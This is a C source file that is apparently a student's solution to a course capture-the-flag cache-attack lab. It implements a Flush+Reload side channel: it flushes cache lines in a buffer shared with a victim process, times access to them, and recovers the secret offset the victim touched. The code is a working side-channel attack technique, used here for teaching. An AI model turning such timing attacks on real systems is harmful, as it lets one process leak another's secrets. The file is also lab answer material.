SHD-CacheAttackLab/Part2-FlushReload/attacker.c

65 lines
1.8 KiB
C

#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <unistd.h>
#include "util.h"
#define CACHE_HIT_THRESHOLD 200
#define WAIT_TIME 1000
#define AVAR 575479
#define CVAR 10020107
#define AVAR1 199267
#define CVAR1 4900501
int main() {
int index = -1;
int flag = -1;
CYCLES time = -1;
CYCLES new_time = -1;
int offset = 0;
int new_offset = 0;
// buf is shared between the attacker and the victim
char *buf = allocate_shared_buffer();
// [2.1] TODO: Put your capture-the-flag code here
for (int j = 0; j < 1024; j++) {
for(int i = 0; i < 1024; i++) {
clflush((ADDR_PTR)buf + i * 128);
}
for(int i = 0; i < WAIT_TIME; i++);
for(int i = 0; i < 64; i++) {
new_offset = (AVAR * offset + CVAR) % 1024;
if(offset == new_offset||offset-new_offset==1||offset-new_offset==-1) {
offset = (AVAR1 * offset + CVAR1) % 1024;
}
else {
offset = new_offset;
}
time = measure_one_block_access_time((ADDR_PTR)buf + offset * 128);
if(time < CACHE_HIT_THRESHOLD) {
// clflush((ADDR_PTR)buf + offset * 128);
// for(int i = 0; i < WAIT_TIME; i++);
// new_time = measure_one_block_access_time((ADDR_PTR)buf + offset * 128);
// if(new_time < CACHE_HIT_THRESHOLD) {
flag = offset;
index = i;
break;
// }
}
}
if(flag != -1) {
break;
}
}
printf("Flag: %d\n", flag);
printf("Time: %d\n", time);
printf("Index: %d\n", index);
deallocate_shared_buffer(buf);
return 0;
}